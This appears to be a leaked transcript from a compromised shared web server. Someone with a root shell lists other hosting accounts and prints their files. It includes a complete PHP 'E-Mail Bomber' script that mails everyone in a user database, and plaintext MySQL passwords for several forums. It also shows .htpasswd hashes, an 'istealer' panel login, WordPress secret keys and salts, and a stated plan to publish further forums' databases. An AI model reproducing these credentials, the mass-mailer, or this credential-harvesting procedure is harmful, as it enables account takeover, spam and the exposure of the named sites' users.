-rw-r--r-- 1 224422 www 1034 Sep 20 18:24 index.html
drwxr-xr-x 11 224422 www 512 Sep 19 17:36 istealer
-rw-r--r-- 1 224422 www 2704 Oct 18 17:58 mail.php
drwxrwxrwx 2 224422 www 512 Oct 13 21:46 test
drwxrwxrwx 3 224422 www 512 Oct 13 21:41 test2
# cat mail.php
<?php
header('Content-Type: text/html; charset=utf-8');
// ---------------------------- # Konfiguration # -----------------------------------------------------
$db_host = "localhost"; # Der Datenbank-Host
$db_user = "224422_db"; # Der Datenbank-Benutzer
$db_password = "johnny69"; # Das Passwort für die Datenbank
$db_name = "224422_db"; # Der Datenbank-Name
$db_tabelle = "user"; # Die Tabelle
$db_spalte = "email"; # Name der Email-Spalte
$conn = mysql_connect($db_host,$db_user,$db_password) or die (mysql_error());
mysql_select_db($db_name, $conn) or die (mysql_error());
$sql = "SELECT ".$db_spalte." FROM `".$db_tabelle."` WHERE 1";
$ergebnis = mysql_query($sql);
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>E-Mail Bomber</title>
</head>
<body>
<?php
if(isset($_POST['submit'])){
$bom = $_POST['bom'];
$anon = $_POST['anon'];
$von = "From: ".$_POST['von'];
$emp = $_POST['semp'];
echo "Emails werden versanden.";
while($row = mysql_fetch_object($ergebnis))
{
$mail = mail($row->email, $bom, $anon, $von);
if($mail == TRUE){
echo $row->email . " hat EMail erhalten."."<br>";}
else{
echo $row->email . " hat keine Email erhalten."."<br>";}
}
}
?>
<center><pre>######################################
##########-DB-Mass-Mailer--###########
#################-by-#################
##############--bebop--###############
######################################</pre></center><br />
<form action="<?php echo $_SERVER['SCRIPT_NAME']; ?>" method="post">
<table border="0" align="center">
<tr>
<td valign="bottom">Email-Liste:</td>
<td valign="bottom"><div align="right">Betreff:<br>
<input type="text" name="bom" />
</div></td>
<td valign="bottom"><div align="right">von:<br>
<input type="text" name="von" />
</div></td>
</tr>
<tr>
<td colspan="3" valign="bottom"><textarea name="emails" cols="90" rows="10"><?php
while($row = mysql_fetch_object($ergebnis))
{
echo $row->email . "\n";
}
?></textarea><br>Liste lässt sich nicht ändern, musst wenn dann in der DB genert werden.</td>
</tr>
<tr>
<td colspan="3" valign="bottom">Text:<br>
<textarea name="anon" cols="90" rows="10"></textarea></td>
</tr>
<tr>
<td valign="bottom"><br /></td>
<td valign="bottom"><div align="center">
<input type="submit" name="submit" value="mail IT!!" />
</div></td>
<td valign="bottom"></td>
</tr>
</table>
</form>
</body>
</html>
# cat istealer/inc/config.php
<?php
//Connection
$server = 'localhost';
$username = '224422_db';
$passwort = 'johnny69';
$db = '224422_db';
//Logs per page (15 normal)
$pagecount = 15;
//Login
$username_ = 'manifest';
$password_ = 'manifestismus';
mysql_connect($server,$username,$passwort);
mysql_select_db($db);
?>#
# cd /home
# cd hbstream
# ls -la
total 60
drwxr-xr-x 3 hbstream www 512 Oct 3 11:17 ### German Top 100 Single Charts ###
drwxr-x--- 8 hbstream www 512 Oct 3 11:17 .
drwxr-x--x 9 root wheel 512 Sep 30 10:52 ..
drwxr-xr-x 7 hbstream www 9216 Oct 3 10:57 Dubstep & Drum'n'Bass
drwxr-xr-x 3 hbstream www 5632 Oct 2 12:19 Hardstyle & Hardcore
drwxr-xr-x 13 hbstream www 512 Oct 4 19:04 Hip Hop & R'n'B & Rap
drwxr-xr-x 5 hbstream www 512 Oct 4 19:04 House & Electro
drwxr-xr-x 23 hbstream www 1024 Oct 4 19:19 Rock & Alternative-Rock & Pop-Rock
-rw-r--r-- 1 hbstream www 566 Sep 30 20:32 www.Hackbase.cc.txt
# cat www.Hackbase.cc.txt
.##.....##....###.....######..##....##.########.....###.....######..########
.##.....##...##.##...##....##.##...##..##.....##...##.##...##....##.##......
.##.....##..##...##..##.......##..##...##.....##..##...##..##.......##......
.#########.##.....##.##.......#####....########..##.....##..######..######..
.##.....##.#########.##.......##..##...##.....##.#########.......##.##......
.##.....##.##.....##.##....##.##...##..##.....##.##.....##.##....##.##......
.##.....##.##.....##..######..##....##.########..##.....##..######..########
Visit us!
www.Hackbase.cc#
# omg^C
# cd /home/secunet/
# ls -la
total 28
drwxr-x--- 5 secunet www 512 Jul 6 21:14 .
drwxr-x--x 9 root wheel 512 Sep 30 10:52 ..
drwxrwx--- 18 secunet www 2560 Sep 26 08:29 secunet.to
drwxrwxrwx 17 secunet www 2560 Sep 18 16:16 secunet.u2m.ru
drwxrwx--- 2 secunet www 1024 Oct 5 02:36 temp
# grep dbname includes/config.php
$config['Database']['dbname'] = 'secunet_db';
# grep username includes/config.php
// This is the username and password you use to access MySQL.
$config['MasterServer']['username'] = 'secunet_db';
$config['SlaveServer']['username'] = '';
# grep password includes/config.php
// This is the username and password you use to access MySQL.
$config['MasterServer']['password'] = 'aAtCcjISa41';
$config['SlaveServer']['password'] = '';
# cd /home/webserver
# ls -la
total 32
drwxr-xr-x 7 webserver www 512 Sep 30 12:16 .
drwxr-x--x 9 root wheel 512 Sep 30 10:52 ..
drwxr-xr-x 2 webserver www 512 Jun 30 15:56 .auth
drw-r----- 2 webserver www 512 Jun 29 15:53 free-hack.w2c.ru
drwxr-x--- 18 webserver www 3072 Oct 3 19:45 hackbase.cc
drwxrwx--- 2 webserver www 512 Sep 6 10:34 m.hackbase.cc
drwxrwx--- 2 webserver www 1024 Oct 5 10:47 temp
# cd .auth
# ls -la
total 12
drwxr-xr-x 2 webserver www 512 Jun 30 15:56 .
drwxr-xr-x 7 webserver www 512 Sep 30 12:16 ..
-r-xr-x--- 1 webserver www 35 Jul 1 02:26 .htpasswd
# cat .htpasswd
:$1$mfjXKRh6$ansxD9hBY1yOwCc1CGQTN.
# cd ..
# cd hackbase.cc
# ls -la
total 5780
drwxr-x--- 18 webserver www 3072 Oct 3 19:45 .
drwxr-xr-x 7 webserver www 512 Sep 30 12:16 ..
-rw-r--r-- 1 webserver www 23961 Aug 25 04:18 LICENSE
-rw-r--r-- 1 webserver www 44950 Aug 25 04:53 ajax.php
-rw-r--r-- 1 webserver www 76022 Aug 25 04:53 album.php
-rw-r--r-- 1 webserver www 19420 Aug 25 04:53 announcement.php
-rw-r--r-- 1 webserver www 4314 Aug 25 04:53 api.php
-rw-r--r-- 1 webserver www 3907 Aug 25 04:53 apichain.php
drwxr-xr-- 2 webserver www 512 Jul 2 13:44 archive
-rw-r--r-- 1 webserver www 8790 Aug 25 04:53 asset.php
-rw-r--r-- 1 webserver www 20483 Aug 25 04:53 assetmanage.php
-rw-r--r-- 1 webserver www 15876 Aug 25 04:53 attachment.php
-rw-r--r-- 1 webserver www 6735 Aug 25 04:53 attachment_inlinemod.php
-rw-r--r-- 1 webserver www 126555 Aug 25 04:53 blog.php
-rw-r--r-- 1 webserver www 19133 Aug 25 04:53 blog_ajax.php
-rw-r--r-- 1 webserver www 3702 Aug 25 04:53 blog_attachment.php
-rw-r--r-- 1 webserver www 3922 Aug 25 04:53 blog_callback.php
-rw-r--r-- 1 webserver www 13210 Aug 25 04:53 blog_external.php
-rw-r--r-- 1 webserver www 60275 Aug 25 04:53 blog_inlinemod.php
-rw-r--r-- 1 webserver www 80604 Aug 25 04:53 blog_post.php
-rw-r--r-- 1 webserver www 8631 Aug 25 04:53 blog_report.php
-rw-r--r-- 1 webserver www 31799 Aug 25 04:53 blog_subscription.php
-rw-r--r-- 1 webserver www 5889 Aug 25 04:53 blog_tag.php
-rw-r--r-- 1 webserver www 109552 Aug 25 04:53 blog_usercp.php
-rw-r--r-- 1 webserver www 96793 Aug 25 04:53 calendar.php
-rw-r--r-- 1 webserver www 193581 Aug 25 04:18 checksums.md5
-rw-r--r-- 1 webserver www 3381 Aug 25 04:53 ckeditor.php
-rw-r--r-- 1 webserver www 43 Aug 25 04:18 clear.gif
drwxr-xr-- 11 webserver www 4096 Aug 13 00:56 clientscript
-rw-r--r-- 1 webserver www 1714 Aug 25 04:53 content.php
-rw-r--r-- 1 webserver www 15427 Aug 25 04:53 converse.php
drwxr-xr-- 7 webserver www 512 Jul 2 03:13 cpstyles
-rw-r--r-- 1 webserver www 3308 Aug 25 04:53 cron.php
-rw-r--r-- 1 webserver www 6251 Aug 25 04:53 css.php
drwxr-xr-- 3 webserver www 512 Jul 2 03:13 customavatars
drwxr-xr-- 3 webserver www 512 Aug 13 00:18 customgroupicons
drwxr-xr-- 2 webserver www 512 Jul 2 03:13 customprofilepics
drwxr-xr-- 4 webserver www 512 Jul 9 21:40 dbtech
drwxr-xr-- 3 webserver www 512 Jul 8 20:55 digitalvb
-rw-r--r-- 1 webserver www 1784 Aug 25 04:53 editor.php
-rw-r--r-- 1 webserver www 47307 Aug 25 04:53 editpost.php
-rw-r--r-- 1 webserver www 1400 Aug 25 04:53 entry.php
-rw-r--r-- 1 webserver www 30358 Aug 25 04:53 external.php
-rw-r--r-- 1 webserver www 9965 Aug 25 04:53 faq.php
-rw-r--r-- 1 webserver www 10134 Aug 25 04:18 favicon.ico
-rw-r--r-- 1 webserver www 524 Aug 25 04:18 file_id.diz
-rw-r--r-- 1 webserver www 22525 Aug 25 04:53 forum.php
-rw-r--r-- 1 webserver www 43184 Aug 25 04:53 forumdisplay.php
-rw-r--r-- 1 webserver www 2070 Aug 25 04:53 global.php
-rw-r--r-- 1 webserver www 152671 Aug 25 04:53 group.php
-rw-r--r-- 1 webserver www 26226 Aug 25 04:53 group_inlinemod.php
-rw-r--r-- 1 webserver www 11407 Aug 25 04:53 groupsubscription.php
drwxr-xr-- 3 webserver www 2560 Aug 22 22:59 hbisonfire
-rw-r--r-- 1 webserver www 9061 Aug 25 04:53 image.php
drwxr-xr-- 28 webserver www 1024 Aug 6 23:56 images
drwxr-xr-- 9 webserver www 7168 Aug 18 12:26 includes
-rw-r--r-- 1 webserver www 2396 Aug 25 04:53 index.php
-rw-r--r-- 1 root www 169 Oct 3 19:45 info.php
-rw-r--r-- 1 webserver www 47302 Aug 25 04:53 infraction.php
-rw-r--r-- 1 webserver www 187364 Aug 25 04:53 inlinemod.php
-rw-r--r-- 1 webserver www 11742 Aug 25 04:53 joinrequests.php
-rw-r--r-- 1 webserver www 1720 Aug 25 04:53 list.php
-rw-r--r-- 1 webserver www 11100 Aug 25 04:53 login.php
-rw-r--r-- 1 webserver www 30891 Aug 25 04:53 member.php
-rw-r--r-- 1 webserver www 16391 Aug 25 04:53 member_inlinemod.php
-rw-r--r-- 1 webserver www 40134 Aug 25 04:53 memberlist.php
-rw-r--r-- 1 webserver www 22263 Aug 25 04:53 misc.php
-rw-r--r-- 1 webserver www 3957 Aug 25 04:53 mobile.php
-rw-r--r-- 1 webserver www 76389 Aug 25 04:53 moderation.php
-rw-r--r-- 1 webserver www 6778 Aug 25 04:53 moderator.php
-rw-r--r-- 1 webserver www 17561 Aug 25 04:53 newattachment.php
-rw-r--r-- 1 webserver www 41469 Aug 25 04:53 newreply.php
-rw-r--r-- 1 webserver www 20667 Aug 25 04:53 newthread.php
-rw-r--r-- 1 webserver www 21607 Aug 25 04:53 online.php
drwxr-xr-- 8 webserver www 512 Jul 2 03:20 packages
-rw-r--r-- 1 webserver www 8571 Aug 25 04:53 payment_gateway.php
-rw-r--r-- 1 webserver www 13359 Aug 25 04:53 payments.php
-rw-r--r-- 1 webserver www 4061 Aug 25 04:53 picture.php
-rw-r--r-- 1 webserver www 16664 Aug 25 04:53 picture_inlinemod.php
-rw-r--r-- 1 webserver www 26595 Aug 25 04:53 picturecomment.php
-rw-r--r-- 1 webserver www 29356 Aug 25 04:53 poll.php
-rw-r--r-- 1 webserver www 17737 Aug 25 05:39 post_thanks.php
-rw-r--r-- 1 webserver www 10363 Aug 25 04:53 posthistory.php
-rw-r--r-- 1 webserver www 76560 Aug 25 04:53 postings.php
-rw-r--r-- 1 webserver www 7082 Aug 25 04:53 printthread.php
-rw-r--r-- 1 webserver www 81402 Aug 25 04:53 private.php
-rw-r--r-- 1 webserver www 163833 Aug 25 04:53 profile.php
-rw-r--r-- 1 webserver www 1053 Aug 18 00:44 rbs_wrapper.swf
-rw-r--r-- 1 webserver www 56507 Aug 25 04:53 register.php
-rw-r--r-- 1 webserver www 7293 Aug 25 04:53 report.php
-rw-r--r-- 1 webserver www 14764 Aug 25 04:53 reputation.php
-rw-r--r-- 1 webserver www 35136 Aug 25 04:53 search.php
-rw-r--r-- 1 webserver www 22917 Aug 25 04:53 sendmessage.php
-rw-r--r-- 1 webserver www 12924 Aug 25 04:53 showgroups.php
-rw-r--r-- 1 webserver www 12851 Aug 25 04:53 showpost.php
-rw-r--r-- 1 webserver www 82235 Aug 25 04:53 showthread.php
drwxr-xr-- 2 webserver www 512 Jul 2 03:22 signaturepics
drwxr-xr-- 2 webserver www 512 Jul 6 16:07 specialmodlogin
drwxr-xr-- 2 webserver www 512 Jul 2 03:22 store_sitemap
-rw-r--r-- 1 webserver www 39286 Aug 25 04:53 subscription.php
-rw-r--r-- 1 webserver www 5398 Aug 25 04:53 tags.php
-rw-r--r-- 1 webserver www 5582 Jul 9 22:23 thanks.php
-rw-r--r-- 1 webserver www 8799 Aug 25 04:53 threadrate.php
-rw-r--r-- 1 webserver www 11149 Aug 25 04:53 threadtag.php
-rw-r--r-- 1 webserver www 61 Aug 25 04:19 uploadprogress.gif
-rw-r--r-- 1 webserver www 39716 Aug 25 04:53 usercp.php
-rw-r--r-- 1 webserver www 21748 Aug 25 04:53 usernote.php
drwxr-xr-- 13 webserver www 1024 Jul 2 03:22 vb
-rw-r--r-- 1 webserver www 6907 Jul 9 23:24 vbshout.php
-rw-r--r-- 1 webserver www 28550 Aug 25 04:53 visitormessage.php
-rw-r--r-- 1 webserver www 1724 Aug 25 04:53 widget.php
-rw-r--r-- 1 webserver www 3846 Aug 25 04:53 xmlsitemap.php
# grep dbname includes/config.php
$config['Database']['dbname'] = 'webserver_base';
# grep username includes/config.php
// This is the username and password you use to access MySQL.
$config['MasterServer']['username'] = 'webserver_base';
$config['SlaveServer']['username'] = '';
# grep password includes/config.php
// This is the username and password you use to access MySQL.
$config['MasterServer']['password'] = 'k4Q5{k+Xz-94W,a{';
$config['SlaveServer']['password'] = '';
# cd hbisonfire
# ls -la
total 4508
drwxr-xr-- 3 webserver www 2560 Aug 22 22:59 .
drwxr-x--- 18 webserver www 3072 Oct 3 19:45 ..
-rw-r--r-- 1 webserver www 165 Aug 25 04:19 .htaccess
-rw-r--r-- 1 webserver www 44 Aug 25 04:19 .htpasswd
-rw-r--r-- 1 webserver www 19367 Aug 25 04:53 accessmask.php
-rw-r--r-- 1 webserver www 35727 Aug 25 04:53 ad.php
-rw-r--r-- 1 webserver www 15526 Aug 18 00:42 admin_rbs.php
-rw-r--r-- 1 webserver www 3354 Aug 18 00:42 admin_rbs_banner_list.php
-rw-r--r-- 1 webserver www 2289 Aug 18 00:42 admin_rbs_delete.php
-rw-r--r-- 1 webserver www 2366 Aug 18 00:42 admin_rbs_disable.php
-rw-r--r-- 1 webserver www 39681 Aug 25 04:53 admincalendar.php
-rw-r--r-- 1 webserver www 50113 Aug 25 04:53 admininfraction.php
-rw-r--r-- 1 webserver www 19166 Aug 25 04:53 adminlog.php
-rw-r--r-- 1 webserver www 8333 Aug 25 04:53 adminpermissions.php
-rw-r--r-- 1 webserver www 25946 Aug 25 04:53 adminreputation.php
-rw-r--r-- 1 webserver www 13116 Aug 25 04:53 announcement.php
-rw-r--r-- 1 webserver www 3532 Aug 25 04:53 api.php
-rw-r--r-- 1 webserver www 18912 Aug 25 04:53 apilog.php
-rw-r--r-- 1 webserver www 14594 Aug 25 04:53 apistats.php
-rw-r--r-- 1 webserver www 56243 Aug 25 04:53 attachment.php
-rw-r--r-- 1 webserver www 12528 Aug 25 04:53 attachmentpermission.php
-rw-r--r-- 1 webserver www 19346 Aug 25 04:53 avatar.php
-rw-r--r-- 1 webserver www 18089 Aug 25 04:53 bbcode.php
-rw-r--r-- 1 webserver www 12151 Aug 25 04:53 block.php
-rw-r--r-- 1 webserver www 100187 Aug 25 04:53 blog_admin.php
-rw-r--r-- 1 webserver www 15227 Aug 25 04:53 bookmarksite.php
-rw-r--r-- 1 webserver www 12099 Aug 25 04:53 calendarpermission.php
-rw-r--r-- 1 webserver www 43 Aug 25 04:19 clear.gif
-rw-r--r-- 1 webserver www 60992 Aug 25 04:53 cms_admin.php
-rw-r--r-- 1 webserver www 15459 Aug 25 04:53 cms_content_admin.php
-rw-r--r-- 1 webserver www 24341 Aug 25 04:53 cms_permissions.php
drwxr-xr-- 2 webserver www 512 Jul 2 03:09 control_examples
-rw-r--r-- 1 webserver www 24040 Aug 25 04:53 cronadmin.php
-rw-r--r-- 1 webserver www 10750 Aug 25 04:53 cronlog.php
-rw-r--r-- 1 webserver www 34189 Aug 25 04:53 css.php
-rw-r--r-- 1 webserver www 22980 Aug 25 04:53 diagnostic.php
-rw-r--r-- 1 webserver www 11739 Aug 25 04:53 email.php
-rw-r--r-- 1 webserver www 24532 Aug 25 04:53 faq.php
-rw-r--r-- 1 webserver www 12192 Aug 20 18:40 force_read_thread.php
-rw-r--r-- 1 webserver www 31484 Aug 25 04:53 forum.php
-rw-r--r-- 1 webserver www 30079 Aug 25 04:53 forumpermission.php
-rw-r--r-- 1 webserver www 7599 Aug 25 04:53 global.php
-rw-r--r-- 1 webserver www 23687 Aug 25 04:53 help.php
-rw-r--r-- 1 webserver www 51910 Aug 25 04:53 image.php
-rw-r--r-- 1 webserver www 8046 Aug 7 21:03 inactivitylog.php
-rw-r--r-- 1 webserver www 43588 Aug 25 04:53 index.php
-rw-r--r-- 1 webserver www 35381 Aug 25 04:53 language.php
-rw-r--r-- 1 webserver www 74149 Aug 25 04:53 misc.php
-rw-r--r-- 1 webserver www 34575 Aug 25 04:53 moderator.php
-rw-r--r-- 1 webserver www 16950 Aug 25 04:53 modlog.php
-rw-r--r-- 1 webserver www 1639 Aug 25 04:53 newsproxy.php
-rw-r--r-- 1 webserver www 29629 Aug 25 04:53 notice.php
-rw-r--r-- 1 webserver www 43243 Aug 25 04:53 options.php
-rw-r--r-- 1 webserver www 11759 Aug 25 04:53 passwordcheck.php
-rw-r--r-- 1 webserver www 64527 Aug 25 04:53 phrase.php
-rw-r--r-- 1 webserver www 56994 Aug 25 04:53 plugin.php
-rw-r--r-- 1 webserver www 12709 Aug 25 05:38 post_thanks_admin.php
-rw-r--r-- 1 webserver www 33126 Aug 25 04:53 prefix.php
-rw-r--r-- 1 webserver www 49792 Aug 25 04:53 profilefield.php
-rw-r--r-- 1 webserver www 19412 Aug 25 04:53 queries.php
-rw-r--r-- 1 webserver www 11315 Aug 25 04:53 ranks.php
-rw-r--r-- 1 webserver www 13907 Aug 25 04:53 repair.php
-rw-r--r-- 1 webserver www 15718 Aug 25 04:53 replacement.php
-rw-r--r-- 1 webserver www 2172 Aug 7 21:03 resetreminders.php
-rw-r--r-- 1 webserver www 11019 Aug 25 04:53 resources.php
-rw-r--r-- 1 webserver www 20751 Aug 25 04:53 rssposter.php
-rw-r--r-- 1 webserver www 15216 Aug 25 04:53 sitemap.php
-rw-r--r-- 1 webserver www 50236 Aug 25 04:19 skimlinks.php
-rw-r--r-- 1 webserver www 12797 Aug 25 04:53 socialgroup_icon.php
-rw-r--r-- 1 webserver www 17741 Aug 25 04:53 socialgroups.php
-rw-r--r-- 1 webserver www 8705 Aug 25 04:53 stats.php
-rw-r--r-- 1 webserver www 48065 Aug 25 04:53 stylevar.php
-rw-r--r-- 1 webserver www 8210 Aug 25 04:53 subscriptionpermission.php
-rw-r--r-- 1 webserver www 62322 Aug 25 04:53 subscriptions.php
-rw-r--r-- 1 webserver www 17595 Aug 25 04:53 tag.php
-rw-r--r-- 1 webserver www 122861 Aug 25 04:53 template.php
-rw-r--r-- 1 webserver www 4297 Aug 25 04:53 textarea.php
-rw-r--r-- 1 webserver www 3538 Jul 9 22:23 thanks.php
-rw-r--r-- 1 webserver www 45842 Aug 25 04:53 thread.php
-rw-r--r-- 1 webserver www 95585 Aug 25 04:53 user.php
-rw-r--r-- 1 webserver www 57848 Aug 25 04:53 usergroup.php
-rw-r--r-- 1 webserver www 7287 Aug 25 04:53 usertitle.php
-rw-r--r-- 1 webserver www 77892 Aug 25 04:53 usertools.php
-rw-r--r-- 1 webserver www 3546 Jul 9 23:26 vbshout.php
-rw-r--r-- 1 webserver www 18768 Aug 25 04:53 verify.php
-rw-r--r-- 1 webserver www 14515 Aug 25 04:53 verticalresponse.php
# cat .htaccess
<IfModule mod_rewrite.c>
RewriteEngine off
</IfModule>
AuthName "."
AuthType Basic
AuthUserFile "/home/webserver/hackbase.cc/hbisonfire/.htpasswd"
require valid-user
# cat .htpasswd
easypeasy:$1$aQrzlLc5$5oX4r2IqDcdQ/DOhP3RRG.
# cd /home/4004/
# ls -la
total 20
drwxr-x--- 5 4004 www 512 Oct 8 18:55 .
drwxr-x--x 9 root wheel 512 Oct 14 00:41 ..
drwxrwx--- 3 4004 www 512 Oct 9 15:39 4004-security-project.com
drwxr-xr-x 2 4004 www 512 Oct 8 19:05 hta
drwxrwx--- 2 4004 www 512 Oct 9 15:35 temp
# cd 4004-security-project.com/
# ls -la
total 16
drwxrwx--- 3 4004 www 512 Oct 9 15:39 .
drwxr-x--- 5 4004 www 512 Oct 8 18:55 ..
drwxr-xr-x 6 4004 www 1024 Oct 10 04:15 blog
-rw-r--r-- 1 4004 www 71 Oct 9 15:39 index.php
# cat blog/wp-config.php
<?php
/**
* In dieser Datei werden die Grundeinstellungen für WordPress vorgenommen.
*
* Zu diesen Einstellungen gehören: MySQL-Zugangsdaten, Tabellenpräfix,
* Secret-Keys, Sprache und ABSPATH. Mehr Informationen zur wp-config.php gibt es auf der {@link http://codex.wordpress.org/Editing_wp-config.php
* wp-config.php editieren} Seite im Codex. Die Informationen für die MySQL-Datenbank bekommst du von deinem Webhoster.
*
* Diese Datei wird von der wp-config.php-Erzeugungsroutine verwendet. Sie wird ausgefährt, wenn noch keine wp-config.php (aber eine wp-config-sample.php) vorhanden ist,
* und die Installationsroutine (/wp-admin/install.php) aufgerufen wird.
* Man kann aber auch direkt in dieser Datei alle Eingaben vornehmen und sie von wp-config-sample.php in wp-config.php umbenennen und die Installation starten.
*
* @package WordPress
*/
/** MySQL Einstellungen - diese Angaben bekommst du von deinem Webhoster. */
/** Ersetze database_name_here mit dem Namen der Datenbank, die du verwenden möchtest. */
define('DB_NAME', '4004_db');
/** Ersetze username_here mit deinem MySQL-Datenbank-Benutzernamen */
define('DB_USER', '4004_db');
/** Ersetze password_here mit deinem MySQL-Passwort */
define('DB_PASSWORD', 'dsa234dvb54Xd12SC');
/** Ersetze localhost mit der MySQL-Serveradresse */
define('DB_HOST', 'localhost');
/** Der Datenbankzeichensatz der beim Erstellen der Datenbanktabellen verwendet werden soll */
define('DB_CHARSET', 'utf8');
/** Der collate type sollte nicht geändert werden */
define('DB_COLLATE', '');
/**#@+
* Sicherheitsschlüssel
*
* Ändere jeden KEY in eine beliebige, möglichst einzigartige Phrase.
* Auf der Seite {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service} kannst du dir alle KEYS generieren lassen.
* Bitte trage für jeden KEY eine eigene Phrase ein. Du kannst die Schlüssel jederzeit wieder ändern, alle angemeldeten Benutzer müssen sich danach erneut anmelden.
*
* @seit 2.6.0
*/
define('AUTH_KEY', 'uM]_a ceaNwK9= T<6i$`2!&[V5|,H1J^+=wx$`D1X4T*`O}&vp;%/(J}5RcZkFA');
define('SECURE_AUTH_KEY', '|vo&mKO$8]o0(s>joQ*Qm0z5D|iy(%lu:bC(L$+fcCqy4PuBk^|q~^}ZzftvJVyN');
define('LOGGED_IN_KEY', '?Z{|TYufOz9Nj8Zm h|}yEhPoz/YQFn7VO-PsUZK MigN,=bEiI(>%5;zc+)E^Z:');
define('NONCE_KEY', '@Dm`X,?z~esFh1`n]f-dh|<S_`&{!zMCAGgV[BZSe6$v$=7^Uz#dq+`N~B}F-y{a');
define('AUTH_SALT', 'bPuhsC49%tzWjvsh)O~wDbtVDR=A//Zh.E,t%b{X9uU/Vvsm;]ojLn<j(d2z6`A^');
define('SECURE_AUTH_SALT', 'aWB,3a$%uEBV+kYS5tN2H7A|RzF$.]}({niGb@$PUmxo-@Fw]P! FsMIjosH?@40');
define('LOGGED_IN_SALT', 'tmWO#_?Q_c$&Y|;CBtfDP>!$DhzVXZ5iep|4jijRsVe)U&IxQ4qhj^e_1:,G_v {');
define('NONCE_SALT', ')2O=Fe-ow13$6ii)|F-&4LROwgZo~KkQ+e;PeV9l)ySD7:XH8R%|}lXcly$-4*3G');
/**#@-*/
/**
* WordPress Datenbanktabellen-Präfix
*
* Wenn du verschiedene Präfixe benutzt, kannst du innerhalb einer Datenbank
* verschiedene WordPress-Installationen betreiben. Nur Zahlen, Buchstaben und Unterstriche bitte!
*/
$table_prefix = 'wp_';
/**
* WordPress Sprachdatei
*
* Hier kannst du einstellen, welche Sprachdatei benutzt werden soll. Die entsprechende
* Sprachdatei muss im Ordner wp-content/languages vorhanden sein, beispielsweise de_DE.mo
* Wenn du nichts einträgst, wird Englisch genommen.
*/
define('WPLANG', 'de_DE');
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*/
define('WP_DEBUG', false);
/* That's all, stop editing! Happy blogging. */
/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
define('ABSPATH', dirname(__FILE__) . '/');
/** Sets up WordPress vars and included files. */
Have fun with the database.
,;~;,
/\_
( /
(() //)
| \\ ,,;;'\
__ _( )m=((((((((((((((====={ Some leftovers }====-------
/' ' '()/~' '.(, |
,;( )|| | ~ Some targets are still to be exposed, but there
,;' \ /-(.;, ) is not really anything left to be shaped in
) / ) / words. In fact we think that it would be best to
// || simply publish their databases without a lot of
)_\ )_\ hesitation. So the rest includes three further
forums named union-district.cc, cyberbase.us and secret-network.biz
# pwd
/home/ixde
# ls -la
total 24
drwxr-x--- 4 ixde www 512 Aug 28 00:55 .
drwxr-x--x 13 root wheel 512 Sep 22 21:06 ..
drwxrwx--- 2 ixde www 5632 Oct 18 17:06 temp
drwxrwx--- 3 ixde www 512 Oct 2 22:38 union-district.cc
# cd union-district.cc
# ls -la
total 20
drwxrwx--- 3 ixde www 512 Oct 2 22:38 .
drwxr-x--- 4 ixde www 512 Aug 28 00:55 ..
drwxr-xr-x 19 ixde www 2560 Oct 18 17:04 board
-rw-r--r-- 1 ixde www 53 Aug 17 16:13 index.php
# cd board
# ls -la
total 4692
drwxr-xr-x 19 ixde www 2560 Oct 18 17:04 .
drwxrwx--- 3 ixde www 512 Oct 2 22:38 ..
-rw-r--r-- 1 ixde www 987 Mar 10 2011 .htaccess
drwxr-xr-x 3 ixde www 2048 Oct 11 17:28 0Ok4ae8FjOQ1d8R5EjCS3qIc3RMPolA
-rw-r--r-- 1 ixde www 17881 Jun 4 12:11 LICENSE
drwxr-xr-x 2 ixde www 512 Jul 9 22:12 LokAKr5K7MfZn0n0JdLfD75vuBRc5E9
drwxr-xr-x 2 ixde www 512 Sep 17 19:40 Partner
drwxr-xr-x 2 ixde www 512 Jul 11 17:27 admincp
-rw-r--r-- 1 ixde www 23810 Aug 23 14:17 ajax.php
-rw-r--r-- 1 ixde www 75447 Jun 4 12:16 album.php
-rw-r--r-- 1 ixde www 17082 Jun 4 12:16 announcement.php
drwxr-xr-x 2 ixde www 512 Jul 7 14:23 archive
-rw-r--r-- 1 ixde www 18245 Jun 4 12:16 attachment.php
-rw-r--r-- 1 ixde www 75263 Jun 4 12:16 calendar.php
-rw-r--r-- 1 ixde www 43 Jun 2 06:12 clear.gif
drwxr-xr-x 4 ixde www 2560 Jul 22 18:28 clientscript
-rw-r--r-- 1 ixde www 14872 Jun 4 12:16 converse.php
drwxr-xr-x 7 ixde www 512 Jul 7 14:24 cpstyles
-rw-r--r-- 1 ixde www 3254 Jun 4 12:16 cron.php
drwxr-xr-x 3 ixde www 512 Jul 7 14:24 customavatars
drwxr-xr-x 3 ixde www 512 Jul 7 14:24 customgroupicons
drwxr-xr-x 2 ixde www 512 Jul 7 14:24 customprofilepics
-rw-r--r-- 1 ixde www 123083 Sep 21 15:38 default3i.jpg
-rw-r--r-- 1 ixde www 2522 Sep 21 15:44 dnp_fw.php
-rw-r--r-- 1 ixde www 511 Sep 21 15:42 dnp_fw_config.php
-rw-r--r-- 1 ixde www 1101 Sep 21 15:40 dnp_fw_template.php
-rw-r--r-- 1 ixde www 47702 Jun 4 12:16 editpost.php
-rw-r--r-- 1 ixde www 29848 Jul 9 21:00 external.php
-rw-r--r-- 1 ixde www 9723 Jun 4 12:16 faq.php
-rw-r--r-- 1 ixde www 9662 Oct 12 16:46 favicon.ico
-rw-r--r-- 1 ixde www 35940 Jun 4 12:16 forumdisplay.php
-rw-r--r-- 1 ixde www 39768 Oct 2 22:38 global.php
-rw-r--r-- 1 ixde www 138140 Jun 4 12:16 group.php
-rw-r--r-- 1 ixde www 24856 Jun 4 12:16 group_inlinemod.php
-rw-r--r-- 1 ixde www 10458 Jun 4 12:16 groupsubscription.php
-rw-r--r-- 1 ixde www 8984 Jun 4 12:16 image.php
drwxr-xr-x 18 ixde www 512 Jul 18 20:21 images
drwxr-xr-x 8 ixde www 5120 Oct 18 17:04 includes
-rw-r--r-- 1 ixde www 19678 Jun 4 12:16 index.php
-rw-r--r-- 1 ixde www 43865 Jun 4 12:16 infraction.php
-rw-r--r-- 1 ixde www 183062 Jun 4 12:16 inlinemod.php
